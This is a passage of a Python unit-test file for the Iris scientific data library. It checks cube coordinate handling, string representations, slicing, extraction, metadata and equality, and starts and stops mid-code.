cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord)
cube.add_aux_coord(scalar_aux_coord)
self.assertEqual(set(cube.aux_coords), {scalar_dim_coord, scalar_aux_coord})
# Various options for dims
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, [])
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, ())
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, None)
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord)
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
def test_add_aux_coord(self):
y_another = iris.coords.DimCoord(np.array([ 2.5, 7.5, 12.5]), long_name='y_another')
# DimCoords can live in cube.aux_coords
self.cube.add_aux_coord(y_another, 0)
self.assertEqual(self.cube.dim_coords, ())
self.assertEqual(self.cube.coords(), [y_another])
self.assertEqual(self.cube.aux_coords, (y_another,))
# AuxCoords in cube.aux_coords
self.cube.add_aux_coord(self.xy, [0, 1])
self.assertEqual(self.cube.dim_coords, ())
self.assertEqual(self.cube.coords(), [y_another, self.xy])
self.assertEqual(set(self.cube.aux_coords), {y_another, self.xy})
# Lengths must match up
cube = self.cube.copy()
with self.assertRaises(ValueError):
cube.add_aux_coord(self.xy, [1, 0])
def test_remove_coord(self):
self.cube.add_dim_coord(self.y, 0)
self.cube.add_dim_coord(self.x, 1)
self.cube.add_aux_coord(self.xy, (0, 1))
self.assertEqual(set(self.cube.coords()), {self.y, self.x, self.xy})
self.cube.remove_coord('xy')
self.assertEqual(set(self.cube.coords()), {self.y, self.x})
self.cube.remove_coord('x')
self.assertEqual(self.cube.coords(), [self.y])
self.cube.remove_coord('y')
self.assertEqual(self.cube.coords(), [])
def test_immutable_dimcoord_dims(self):
# Add DimCoord to dimension 1
dims = [1]
self.cube.add_dim_coord(self.x, dims)
self.assertEqual(self.cube.coord_dims(self.x), (1,))
# Change dims object
dims[0] = 0
# Check the cube is unchanged
self.assertEqual(self.cube.coord_dims(self.x), (1,))
# Check coord_dims cannot be changed
dims = self.cube.coord_dims(self.x)
with self.assertRaises(TypeError):
dims[0] = 0
def test_immutable_auxcoord_dims(self):
# Add AuxCoord to dimensions (0, 1)
dims = [0, 1]
self.cube.add_aux_coord(self.xy, dims)
self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
# Change dims object
dims[0] = 1
dims[1] = 0
# Check the cube is unchanged
self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
# Check coord_dims cannot be changed
dims = self.cube.coord_dims(self.xy)
with self.assertRaises(TypeError):
dims[0] = 1
@tests.skip_data
class TestStockCubeStringRepresentations(tests.IrisTest):
def setUp(self):
self.cube = iris.tests.stock.realistic_4d()
def test_4d_str(self):
self.assertString(str(self.cube))
def test_4d_repr(self):
self.assertString(repr(self.cube))
def test_3d_str(self):
self.assertString(str(self.cube[0]))
def test_3d_repr(self):
self.assertString(repr(self.cube[0]))
def test_2d_str(self):
self.assertString(str(self.cube[0, 0]))
def test_2d_repr(self):
self.assertString(repr(self.cube[0, 0]))
def test_1d_str(self):
self.assertString(str(self.cube[0, 0, 0]))
def test_1d_repr(self):
self.assertString(repr(self.cube[0, 0, 0]))
def test_0d_str(self):
self.assertString(str(self.cube[0, 0, 0, 0]))
def test_0d_repr(self):
self.assertString(repr(self.cube[0, 0, 0, 0]))
@tests.skip_data
class TestCubeStringRepresentations(IrisDotTest):
def setUp(self):
path = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
self.cube_2d = iris.load_cube(path)
# Generate the unicode cube up here now it's used in two tests.
unicode_str = six.unichr(40960) + u'abcd' + six.unichr(1972)
self.unicode_cube = iris.tests.stock.simple_1d()
self.unicode_cube.attributes['source'] = unicode_str
def test_dot_simple_pp(self):
# Test dot output of a 2d cube loaded from pp.
cube = self.cube_2d
cube.attributes['my_attribute'] = 'foobar'
self.check_dot(cube, ('file_load', 'global_pp.dot'))
pt = cube.coord('time')
# and with custom coord attributes
pt.attributes['monty'] = 'python'
pt.attributes['brain'] = 'hurts'
self.check_dot(cube, ('file_load', 'coord_attributes.dot'))
del pt.attributes['monty']
del pt.attributes['brain']
del cube.attributes['my_attribute']
# TODO hybrid height and dot output - relatitionship links
@tests.skip_data
def test_dot_4d(self):
cube = iris.tests.stock.realistic_4d()
self.check_dot(cube, ('file_load', '4d_pp.dot'))
@tests.skip_data
def test_missing_coords(self):
cube = iris.tests.stock.realistic_4d()
cube.remove_coord('time')
cube.remove_coord('model_level_number')
self.assertString(repr(cube),
('cdm', 'str_repr', 'missing_coords_cube.repr.txt'))
self.assertString(str(cube),
('cdm', 'str_repr', 'missing_coords_cube.str.txt'))
@tests.skip_data
def test_cubelist_string(self):
cube_list = iris.cube.CubeList([iris.tests.stock.realistic_4d(),
iris.tests.stock.global_pp()])
self.assertString(str(cube_list), ('cdm', 'str_repr', 'cubelist.__str__.txt'))
self.assertString(repr(cube_list), ('cdm', 'str_repr', 'cubelist.__repr__.txt'))
def test_basic_0d_cube(self):
self.assertString(repr(self.cube_2d[0, 0]),
('cdm', 'str_repr', '0d_cube.__repr__.txt'))
self.assertString(six.text_type(self.cube_2d[0, 0]),
('cdm', 'str_repr', '0d_cube.__unicode__.txt'))
self.assertString(str(self.cube_2d[0, 0]),
('cdm', 'str_repr', '0d_cube.__str__.txt'))
def test_similar_coord(self):
cube = self.cube_2d.copy()
lon = cube.coord('longitude')
lon.attributes['flight'] = '218BX'
lon.attributes['sensor_id'] = 808
lon.attributes['status'] = 2
lon2 = lon.copy()
lon2.attributes['sensor_id'] = 810
lon2.attributes['ref'] = 'A8T-22'
del lon2.attributes['status']
cube.add_aux_coord(lon2, [1])
lat = cube.coord('latitude')
lat2 = lat.copy()
lat2.attributes['test'] = 'True'
cube.add_aux_coord(lat2, [0])
self.assertString(str(cube), ('cdm', 'str_repr', 'similar.__str__.txt'))
def test_cube_summary_cell_methods(self):
cube = self.cube_2d.copy()
# Create a list of values used to create cell methods
test_values = ((("mean",), (u'longitude', 'latitude'), (u'6 minutes', '12 minutes'), (u'This is a test comment',)),
(("average",), (u'longitude', 'latitude'), (u'6 minutes', '15 minutes'), (u'This is another test comment', 'This is another comment')),
(("average",), (u'longitude', 'latitude'), (), ()),
(("percentile",), (u'longitude',), (u'6 minutes',), (u'This is another test comment',)))
for x in test_values:
# Create a cell method
cm = iris.coords.CellMethod(method=x[0][0], coords=x[1], intervals=x[2], comments=x[3])
cube.add_cell_method(cm)
self.assertString(str(cube), ('cdm', 'str_repr', 'cell_methods.__str__.txt'))
def test_cube_summary_alignment(self):
# Test the cube summary dimension alignment and coord name clipping
cube = iris.tests.stock.simple_1d()
aux = iris.coords.AuxCoord(
np.arange(11),
long_name='This is a really, really, really, really long '
'long_name that must be clipped because it is too long')
cube.add_aux_coord(aux, 0)
aux = iris.coords.AuxCoord(np.arange(11),
long_name='This is a short long_name')
cube.add_aux_coord(aux, 0)
self.assertString(str(cube), ('cdm', 'str_repr', 'simple.__str__.txt'))
@contextmanager
def unicode_encoding_change(self, new_encoding):
default_encoding = sys.getdefaultencoding()
reload(sys).setdefaultencoding(new_encoding)
yield
sys.setdefaultencoding(default_encoding)
del sys.setdefaultencoding
@unittest.skipIf(six.PY3, 'Encodings are sane in Python 3.')
def test_adjusted_default_encoding(self):
# Test cube str representation on non-system-default encodings.
# Doing this requires access to a sys method that is removed by default
# so reload sys to restore access.
# Note this does not currently work with utf-16 or utf-32.
# Run assertions inside 'with' statement to ensure test file is
# accurately re-created.
with self.unicode_encoding_change('utf-8'):
self.assertString(str(self.unicode_cube),
('cdm', 'str_repr',
'unicode_attribute.__str__.utf8.txt'))
with self.unicode_encoding_change('ascii'):
self.assertString(str(self.unicode_cube),
('cdm', 'str_repr',
'unicode_attribute.__str__.ascii.txt'))
def test_unicode_attribute(self):
self.assertString(
six.text_type(self.unicode_cube),
('cdm', 'str_repr', 'unicode_attribute.__unicode__.txt'))
@tests.skip_data
class TestValidity(tests.IrisTest):
def setUp(self):
self.cube_2d = iris.load_cube(tests.get_data_path(('PP', 'simple_pp', 'global.pp')))
def test_wrong_length_vector_coord(self):
wobble = iris.coords.DimCoord(points=[1, 2], long_name='wobble', units='1')
with self.assertRaises(ValueError):
self.cube_2d.add_aux_coord(wobble, 0)
def test_invalid_dimension_vector_coord(self):
wobble = iris.coords.DimCoord(points=[1, 2], long_name='wobble', units='1')
with self.assertRaises(ValueError):
self.cube_2d.add_dim_coord(wobble, 99)
class TestQueryCoord(tests.IrisTest):
def setUp(self):
self.t = iris.tests.stock.simple_2d_w_multidim_and_scalars()
def test_name(self):
coords = self.t.coords('dim1')
self.assertEqual([coord.name() for coord in coords], ['dim1'])
coords = self.t.coords('dim2')
self.assertEqual([coord.name() for coord in coords], ['dim2'])
coords = self.t.coords('an_other')
self.assertEqual([coord.name() for coord in coords], ['an_other'])
coords = self.t.coords('air_temperature')
self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
coords = self.t.coords('wibble')
self.assertEqual(coords, [])
def test_long_name(self):
# Both standard_name and long_name defined
coords = self.t.coords(long_name='custom long name')
# coord.name() returns standard_name if available
self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
def test_standard_name(self):
# Both standard_name and long_name defined
coords = self.t.coords(standard_name='custom long name')
self.assertEqual([coord.name() for coord in coords], [])
coords = self.t.coords(standard_name='air_temperature')
self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
def test_var_name(self):
coords = self.t.coords(var_name='custom_var_name')
# Matching coord in test cube has a standard_name of 'air_temperature'.
self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
def test_axis(self):
cube = self.t.copy()
cube.coord("dim1").rename("latitude")
cube.coord("dim2").rename("longitude")
coords = cube.coords(axis='y')
self.assertEqual([coord.name() for coord in coords], ['latitude'])
coords = cube.coords(axis='x')
self.assertEqual([coord.name() for coord in coords], ['longitude'])
# Renaming shoudn't be enough
cube.coord("an_other").rename("time")
coords = cube.coords(axis='t')
self.assertEqual([coord.name() for coord in coords], [])
# Change units to "hours since ..." as it's the presence of a
# time unit that identifies a time axis.
cube.coord("time").units = 'hours since 1970-01-01 00:00:00'
coords = cube.coords(axis='t')
self.assertEqual([coord.name() for coord in coords], ['time'])
coords = cube.coords(axis='z')
self.assertEqual(coords, [])
def test_contains_dimension(self):
coords = self.t.coords(contains_dimension=0)
self.assertEqual([coord.name() for coord in coords], ['dim1', 'my_multi_dim_coord'])
coords = self.t.coords(contains_dimension=1)
self.assertEqual([coord.name() for coord in coords], ['dim2', 'my_multi_dim_coord'])
coords = self.t.coords(contains_dimension=2)
self.assertEqual(coords, [])
def test_dimensions(self):
coords = self.t.coords(dimensions=0)
self.assertEqual([coord.name() for coord in coords], ['dim1'])
coords = self.t.coords(dimensions=1)
self.assertEqual([coord.name() for coord in coords], ['dim2'])
# find all coordinates which do not describe a dimension
coords = self.t.coords(dimensions=[])
self.assertEqual([coord.name() for coord in coords], ['air_temperature', 'an_other'])
coords = self.t.coords(dimensions=2)
self.assertEqual(coords, [])
coords = self.t.coords(dimensions=[0, 1])
self.assertEqual([coord.name() for coord in coords], ['my_multi_dim_coord'])
def test_coord_dim_coords_keyword(self):
coords = self.t.coords(dim_coords=True)
self.assertEqual(set([coord.name() for coord in coords]), {'dim1', 'dim2'})
coords = self.t.coords(dim_coords=False)
self.assertEqual(set([coord.name() for coord in coords]), {'an_other', 'my_multi_dim_coord', 'air_temperature'})
def test_coords_empty(self):
coords = self.t.coords()
self.assertEqual(set([coord.name() for coord in coords]), {'dim1', 'dim2', 'an_other', 'my_multi_dim_coord', 'air_temperature'})
def test_coord(self):
coords = self.t.coords(self.t.coord('dim1'))
self.assertEqual([coord.name() for coord in coords], ['dim1'])
# check for metadata look-up by modifying points
coord = self.t.coord('dim1').copy()
coord.points = np.arange(5) * 1.23
coords = self.t.coords(coord)
self.assertEqual([coord.name() for coord in coords], ['dim1'])
def test_str_repr(self):
# TODO consolidate with the TestCubeStringRepresentations class
self.assertString(str(self.t), ('cdm', 'str_repr', 'multi_dim_coord.__str__.txt'))
self.assertString(repr(self.t), ('cdm', 'str_repr', 'multi_dim_coord.__repr__.txt'))
class TestCube2d(tests.IrisTest):
def setUp(self):
self.t = iris.tests.stock.simple_2d_w_multidim_and_scalars()
self.t.remove_coord('air_temperature')
class Test2dIndexing(TestCube2d):
def test_indexing_of_0d_cube(self):
c = self.t[0, 0]
self.assertRaises(IndexError, c.__getitem__, (slice(None, None), ) )
def test_cube_indexing_0d(self):
self.assertCML([self.t[0, 0]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
def test_cube_indexing_1d(self):
self.assertCML([self.t[0, 0:]], ('cube_slice', '2d_to_1d_cube_slice.cml'))
def test_cube_indexing_1d_multi_slice(self):
self.assertCML([self.t[0, (0, 1)]], ('cube_slice', '2d_to_1d_cube_multi_slice.cml'))
self.assertCML([self.t[0, np.array([0, 1])]], ('cube_slice', '2d_to_1d_cube_multi_slice.cml'))
def test_cube_indexing_1d_multi_slice2(self):
self.assertCML([self.t[(0, 2), (0, 1, 3)]], ('cube_slice', '2d_to_1d_cube_multi_slice2.cml'))
self.assertCML([self.t[np.array([0, 2]), (0, 1, 3)]], ('cube_slice', '2d_to_1d_cube_multi_slice2.cml'))
self.assertCML([self.t[np.array([0, 2]), np.array([0, 1, 3])]], ('cube_slice', '2d_to_1d_cube_multi_slice2.cml'))
def test_cube_indexing_1d_multi_slice3(self):
self.assertCML([self.t[(0, 2), :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
self.assertCML([self.t[np.array([0, 2]), :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
def test_cube_indexing_no_change(self):
self.assertCML([self.t[0:, 0:]], ('cube_slice', '2d_orig.cml'))
def test_cube_indexing_reverse_coords(self):
self.assertCML([self.t[::-1, ::-1]], ('cube_slice', '2d_to_2d_revesed.cml'))
def test_cube_indexing_no_residual_change(self):
self.t[0:3]
self.assertCML([self.t], ('cube_slice', '2d_orig.cml'))
def test_overspecified(self):
self.assertRaises(IndexError, self.t.__getitem__, (0, 0, Ellipsis, 0))
self.assertRaises(IndexError, self.t.__getitem__, (0, 0, 0))
def test_ellipsis(self):
self.assertCML([self.t[Ellipsis]], ('cube_slice', '2d_orig.cml'))
self.assertCML([self.t[:, :, :]], ('cube_slice', '2d_orig.cml'))
self.assertCML([self.t[Ellipsis, Ellipsis]], ('cube_slice', '2d_orig.cml'))
self.assertCML([self.t[Ellipsis, Ellipsis, Ellipsis]], ('cube_slice', '2d_orig.cml'))
self.assertCML([self.t[Ellipsis, 0, 0]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
self.assertCML([self.t[0, Ellipsis, 0]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
self.assertCML([self.t[0, 0, Ellipsis]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
self.assertCML([self.t[Ellipsis, (0, 2), :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
self.assertCML([self.t[(0, 2), Ellipsis, :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
self.assertCML([self.t[(0, 2), :, Ellipsis]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
class TestIteration(TestCube2d):
def test_cube_iteration(self):
with self.assertRaises(TypeError):
for subcube in self.t:
pass
class Test2dSlicing(TestCube2d):
def test_cube_slice_all_dimensions(self):
for cube in self.t.slices(['dim1', 'dim2']):
self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
def test_cube_slice_with_transpose(self):
for cube in self.t.slices(['dim2', 'dim1']):
self.assertCML(cube, ('cube_slice', '2d_transposed.cml'))
def test_cube_slice_without_transpose(self):
for cube in self.t.slices(['dim2', 'dim1'], ordered=False):
self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
def test_cube_slice_1dimension(self):
# Result came from the equivalent test test_cube_indexing_1d which
# does self.t[0, 0:]
slices = [res for res in self.t.slices(['dim2'])]
self.assertCML(slices[0], ('cube_slice', '2d_to_1d_cube_slice.cml'))
def test_cube_slice_zero_len_slice(self):
self.assertRaises(IndexError, self.t.__getitem__, (slice(0, 0)))
def test_cube_slice_with_non_existant_coords(self):
with self.assertRaises(iris.exceptions.CoordinateNotFoundError):
self.t.slices(['dim2', 'dim1', 'doesnt exist'])
def test_cube_extract_coord_with_non_describing_coordinates(self):
with self.assertRaises(ValueError):
self.t.slices(['an_other'])
class Test2dSlicing_ByDim(TestCube2d):
def test_cube_slice_all_dimensions(self):
for cube in self.t.slices([0, 1]):
self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
def test_cube_slice_with_transpose(self):
for cube in self.t.slices([1, 0]):
self.assertCML(cube, ('cube_slice', '2d_transposed.cml'))
def test_cube_slice_without_transpose(self):
for cube in self.t.slices([1, 0], ordered=False):
self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
def test_cube_slice_1dimension(self):
# Result came from the equivalent test test_cube_indexing_1d which
# does self.t[0, 0:]
slices = [res for res in self.t.slices([1])]
self.assertCML(slices[0], ('cube_slice', '2d_to_1d_cube_slice.cml'))
def test_cube_slice_nodimension(self):
slices = [res for res in self.t.slices([])]
self.assertCML(slices[0], ('cube_slice', '2d_to_0d_cube_slice.cml'))
def test_cube_slice_with_non_existant_dims(self):
with self.assertRaises(IndexError):
self.t.slices([1, 0, 2])
def test_cube_slice_duplicate_dimensions(self):
with self.assertRaises(ValueError):
self.t.slices([1, 1])
class Test2dSlicing_ByMix(TestCube2d):
def test_cube_slice_all_dimensions(self):
for cube in self.t.slices([0, 'dim2']):
self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
def test_cube_slice_with_transpose(self):
for cube in self.t.slices(['dim2', 0]):
self.assertCML(cube, ('cube_slice', '2d_transposed.cml'))
def test_cube_slice_with_non_existant_dims(self):
with self.assertRaises(ValueError):
self.t.slices([1, 0, 'an_other'])
class Test2dExtraction(TestCube2d):
def test_cube_extract_0d(self):
# Extract the first value from each of the coords in the cube
# this result is shared with the self.t[0, 0] test
self.assertCML([self.t.extract(iris.Constraint(dim1=3.0, dim2=iris.coords.Cell(0, (0, 1))))], ('cube_slice', '2d_to_0d_cube_slice.cml'))
def test_cube_extract_1d(self):
# Extract the first value from the second coord in the cube
# this result is shared with the self.t[0, 0:] test
self.assertCML([self.t.extract(iris.Constraint(dim1=3.0))], ('cube_slice', '2d_to_1d_cube_slice.cml'))
def test_cube_extract_2d(self):
# Do nothing - return the original
self.assertCML([self.t.extract(iris.Constraint())], ('cube_slice', '2d_orig.cml'))
def test_cube_extract_coord_which_does_not_exist(self):
self.assertEqual(self.t.extract(iris.Constraint(doesnt_exist=8.1)), None)
def test_cube_extract_coord_with_non_existant_values(self):
self.assertEqual(self.t.extract(iris.Constraint(dim1=8)), None)
class Test2dExtractionByCoord(TestCube2d):
def test_cube_extract_by_coord_advanced(self):
# This test reverses the coordinate in the cube and also takes a subset of the original coordinate
points = np.array([9, 8, 7, 5, 4, 3, 2, 1, 0], dtype=np.int32)
bounds = np.array([[18, 19], [16, 17], [14, 15], [10, 11], [ 8, 9], [ 6, 7], [ 4, 5], [ 2, 3], [ 0, 1]], dtype=np.int32)
c = iris.coords.DimCoord(points, long_name='dim2', units='meters', bounds=bounds)
self.assertCML(self.t.subset(c), ('cube_slice', '2d_intersect_and_reverse.cml'))
@tests.skip_data
class TestCubeExtract(tests.IrisTest):
def setUp(self):
self.single_cube = iris.load_cube(tests.get_data_path(('PP', 'globClim1', 'theta.pp')), 'air_potential_temperature')
def test_simple(self):
constraint = iris.Constraint(latitude=10)
cube = self.single_cube.extract(constraint)
self.assertCML(cube, ('cdm', 'extract', 'lat_eq_10.cml'))
constraint = iris.Constraint(latitude=lambda c: c > 10)
self.assertCML(self.single_cube.extract(constraint), ('cdm', 'extract', 'lat_gt_10.cml'))
def test_combined(self):
constraint = iris.Constraint(latitude=lambda c: c > 10, longitude=lambda c: c >= 10)
self.assertCML(self.single_cube.extract(constraint), ('cdm', 'extract', 'lat_gt_10_and_lon_ge_10.cml'))
def test_no_results(self):
constraint = iris.Constraint(latitude=lambda c: c > 1000000)
self.assertEqual(self.single_cube.extract(constraint), None)
class TestCubeAPI(TestCube2d):
def test_getting_standard_name(self):
self.assertEqual(self.t.name(), 'test 2d dimensional cube')
def test_rename(self):
self.t.rename('foo')
self.assertEqual(self.t.name(), 'foo')
def test_var_name(self):
self.t.var_name = None
self.assertEqual(self.t.var_name, None)
self.t.var_name = 'bar'
self.assertEqual(self.t.var_name, 'bar')
def test_name_and_var_name(self):
# Assign only var_name.
self.t.standard_name = None
self.t.long_name = None
self.t.var_name = 'foo'
# name() should return var_name if standard_name and
# long_name are None.
self.assertEqual(self.t.name(), 'foo')
def test_rename_and_var_name(self):
self.t.var_name = 'bar'
self.t.rename('foo')
# Rename should clear var_name.
self.assertIsNone(self.t.var_name)
def test_setting_invalid_var_name(self):
# Name with whitespace should raise an exception.
with self.assertRaises(ValueError):
self.t.var_name = 'foo bar'
def test_setting_empty_var_name(self):
# Empty string should raise an exception.
with self.assertRaises(ValueError):
self.t.var_name = ''
def test_getting_units(self):
self.assertEqual(self.t.units, cf_units.Unit('meters'))
def test_setting_units(self):
self.assertEqual(self.t.units, cf_units.Unit('meters'))
self.t.units = 'kelvin'
self.assertEqual(self.t.units, cf_units.Unit('kelvin'))
def test_clearing_units(self):
self.t.units = None
self.assertEqual(str(self.t.units), 'unknown')
def test_convert_units(self):
# Set to 'volt'
self.t.units = cf_units.Unit('volt')
data = self.t.data.copy()
# Change to 'kV' - data should be scaled automatically.
self.t.convert_units('kV')
self.assertEqual(str(self.t.units), 'kV')
self.assertArrayAlmostEqual(self.t.data, data / 1000.0)
def test_coords_are_copies(self):
self.assertIsNot(self.t.coord('dim1'), self.t.copy().coord('dim1'))
def test_metadata_nop(self):
self.t.metadata = self.t.metadata
self.assertIsNone(self.t.standard_name)
self.assertEqual(self.t.long_name, 'test 2d dimensional cube')
self.assertIsNone(self.t.var_name)
self.assertEqual(self.t.units, 'meters')
self.assertEqual(self.t.attributes, {})
self.assertEqual(self.t.cell_methods, ())
def test_metadata_tuple(self):
metadata = ('air_pressure', 'foo', 'bar', '', {'random': '12'}, ())
self.t.metadata = metadata
self.assertEqual(self.t.standard_name, 'air_pressure')
self.assertEqual(self.t.long_name, 'foo')
self.assertEqual(self.t.var_name, 'bar')
self.assertEqual(self.t.units, '')
self.assertEqual(self.t.attributes, metadata[4])
self.assertIsNot(self.t.attributes, metadata[4])
self.assertEqual(self.t.cell_methods, ())
def test_metadata_dict(self):
metadata = {'standard_name': 'air_pressure',
'long_name': 'foo',
'var_name': 'bar',
'units': '',
'attributes': {'random': '12'},
'cell_methods': ()}
self.t.metadata = metadata
self.assertEqual(self.t.standard_name, 'air_pressure')
self.assertEqual(self.t.long_name, 'foo')
self.assertEqual(self.t.var_name, 'bar')
self.assertEqual(self.t.units, '')
self.assertEqual(self.t.attributes, metadata['attributes'])
self.assertIsNot(self.t.attributes, metadata['attributes'])
self.assertEqual(self.t.cell_methods, ())
def test_metadata_attrs(self):
class Metadata(object): pass
metadata = Metadata()
metadata.standard_name = 'air_pressure'
metadata.long_name = 'foo'
metadata.var_name = 'bar'
metadata.units = ''
metadata.attributes = {'random': '12'}
metadata.cell_methods = ()
metadata.cell_measures_and_dims = []
self.t.metadata = metadata
self.assertEqual(self.t.standard_name, 'air_pressure')
self.assertEqual(self.t.long_name, 'foo')
self.assertEqual(self.t.var_name, 'bar')
self.assertEqual(self.t.units, '')
self.assertEqual(self.t.attributes, metadata.attributes)
self.assertIsNot(self.t.attributes, metadata.attributes)
self.assertEqual(self.t.cell_methods, ())
self.assertEqual(self.t._cell_measures_and_dims, [])
def test_metadata_fail(self):
with self.assertRaises(TypeError):
self.t.metadata = ('air_pressure', 'foo', 'bar', '', {'random': '12'})
with self.assertRaises(TypeError):
self.t.metadata = ('air_pressure', 'foo', 'bar', '', {'random': '12'}, (), [], (), ())
with self.assertRaises(TypeError):
self.t.metadata = {'standard_name': 'air_pressure',
'long_name': 'foo',
'var_name': 'bar',
'units': '',
'attributes': {'random': '12'}}
with self.assertRaises(TypeError):
class Metadata(object): pass
metadata = Metadata()
metadata.standard_name = 'air_pressure'
metadata.long_name = 'foo'
metadata.var_name = 'bar'
metadata.units = ''
metadata.attributes = {'random': '12'}
self.t.metadata = metadata
class TestCubeEquality(TestCube2d):
def test_simple_equality(self):
self.assertEqual(self.t, self.t.copy())
def test_data_inequality(self):
self.assertNotEqual(self.t, self.t + 1)
def test_coords_inequality(self):
r = self.t.copy()
r.remove_coord(r.coord('an_other'))
self.assertNotEqual(self.t, r)
def test_attributes_inequality(self):
r = self.t.copy()
r.attributes['new_thing'] = None
self.assertNotEqual(self.t, r)
def test_array_attributes(self):
r = self.t.copy()
r.attributes['things'] = np.arange(3)
s = r.copy()
self.assertEqual(s, r)
s.attributes['things'] = np.arange(2)
self.assertNotEqual(s, r)
del s.attributes['things']
self.assertNotEqual(s, r)
def test_cell_methods_inequality(self):
r = self.t.copy()
r.add_cell_method(iris.coords.CellMethod('mean'))
self.assertNotEqual(self.t, r)
def test_not_compatible(self):
r = self.t.copy()
self.assertTrue(self.t.is_compatible(r))
# The following changes should make the cubes incompatible.
# Different units.
r.units = 'kelvin'
self.assertFalse(self.t.is_compatible(r))
# Different cell_methods.
r = self.t.copy()
r.add_cell_method(iris.coords.CellMethod('mean', coords='dim1'))
self.assertFalse(self.t.is_compatible(r))
# Different attributes.
r = self.t.copy()
self.t.attributes['source']= 'bob'
r.attributes['source'] = 'alice'
self.assertFalse(self.t.is_compatible(r))
def test_compatible(self):
r = self.t.copy()
self.assertTrue(self.t.is_compatible(r))
# The following changes should not affect compatibility.
# Different non-common attributes.
self.t.attributes['source']= 'bob'
r.attributes['origin'] = 'alice'
self.assertTrue(self.t.is_compatible(r))
# Different coordinates.
r.remove_coord('dim1')
self.assertTrue(self.t.is_compatible(r))
# Different data.
r.data = np.zeros(r.shape)
self.assertTrue(self.t.is_compatible(r))
# Different var_names (but equal name()).
r.var_name = 'foo'
self.assertTrue(self.t.is_compatible(r))
def test_is_compatible_ignore(self):
r = self.t.copy()
self.assertTrue(self.t.is_compatible(r))
# Different histories.
self.t.attributes['history'] = 'One history.'
r.attributes['history'] = 'An alternative history.'
self.assertFalse(self.t.is_compatible(r))
# Use ignore keyword.
self.assertTrue(self.t.is_compatible(r, ignore='history'))
self.assertTrue(self.t.is_compatible(r, ignore=('history',)))
self.assertTrue(self.t.is_compatible(r, ignore=r.attributes))
def test_is_compatible_metadata(self):
metadata = self.t.metadata
self.assertTrue(self.t.is_compatible(metadata))
@tests.skip_data
class TestDataManagerIndexing(TestCube2d):
def setUp(self):
self.cube = iris.load_cube(tests.get_data_path(('PP', 'aPProt1', 'rotatedMHtimecube.pp')))
def assert_is_lazy(self, cube):
self.assertTrue(cube.has_lazy_data())
def assert_is_not_lazy(self, cube):
self.assertFalse(cube.has_lazy_data())
def test_slices(self):
lat_cube = next(self.cube.slices(['grid_latitude', ]))
self.assert_is_lazy(lat_cube)
self.assert_is_lazy(self.cube)
def test_cube_empty_indexing(self):
test_filename = ('cube_slice', 'real_empty_data_indexing.cml')
r = self.cube[:5, ::-1][3]
rshape = r.shape
# Make sure we still have deferred data.
self.assert_is_lazy(r)
# check the CML of this result
self.assertCML(r, test_filename)
# The CML was checked, meaning the data must have been loaded.
# Check that the cube no longer has deferred data.
self.assert_is_not_lazy(r)
r_data = r.data
#finally, load the data before indexing and check that it generates the same result
c = self.cube
c.data
c = c[:5, ::-1][3]
self.assertCML(c, test_filename)
self.assertEqual(rshape, c.shape)
np.testing.assert_array_equal(r_data, c.data)
def test_real_data_cube_indexing(self):
cube = self.cube[(0, 4, 5, 2), 0, 0]
self.assertCML(cube, ('cube_slice', 'real_data_dual_tuple_indexing1.cml'))
cube = self.cube[0, (0, 4, 5, 2), (3, 5, 5)]
self.assertCML(cube, ('cube_slice', 'real_data_dual_tuple_indexing2.cml'))
cube = self.cube[(0, 4, 5, 2), 0, (3, 5, 5)]
self.assertCML(cube, ('cube_slice', 'real_data_dual_tuple_indexing3.cml'))
self.assertRaises(IndexError, self.cube.__getitem__, ((0, 4, 5, 2), (3, 5, 5), 0, 0, 4) )
self.assertRaises(IndexError, self.cube.__getitem__, (Ellipsis, Ellipsis, Ellipsis, Ellipsis, Ellipsis, Ellipsis) )
def test_fancy_indexing_bool_array(self):
cube = self.cube
cube.data = np.ma.masked_array(cube.data, mask=cube.data > 100000)
r = cube[:, cube.coord('grid_latitude').points > 1]
self.assertEqual(r.shape, (10, 218, 720))
data = cube.data[:, self.cube.coord('grid_latitude').points > 1, :]
np.testing.assert_array_equal(data, r.data)
np.testing.assert_array_equal(data.mask, r.data.mask)
class TestCubeCollapsed(tests.IrisTest):
def partial_compare(self, dual, single):
result = iris.analysis.coord_comparison(dual, single)
self.assertEqual(len(result['not_equal']), 0)
self.assertEqual(dual.name(), single.name(), "dual and single stage standard_names differ")
self.assertEqual(dual.units, single.units, "dual and single stage units differ")
self.assertEqual(dual.shape, single.shape, "dual and single stage shape differ")
def collapse_test_common(self, cube, a_name, b_name, *args, **kwargs):
# preserve filenames from before the introduction of "grid_" in rotated coord names.
a_filename = a_name.replace("grid_", "")
b_filename = b_name.replace("grid_", "")
# compare dual and single stage collapsing
dual_stage = cube.collapsed(a_name, iris.analysis.MEAN)
dual_stage = dual_stage.collapsed(b_name, iris.analysis.MEAN)
# np.ma.average doesn't apply type promotion rules in some versions,
# and instead makes the result type float64. To ignore that case we
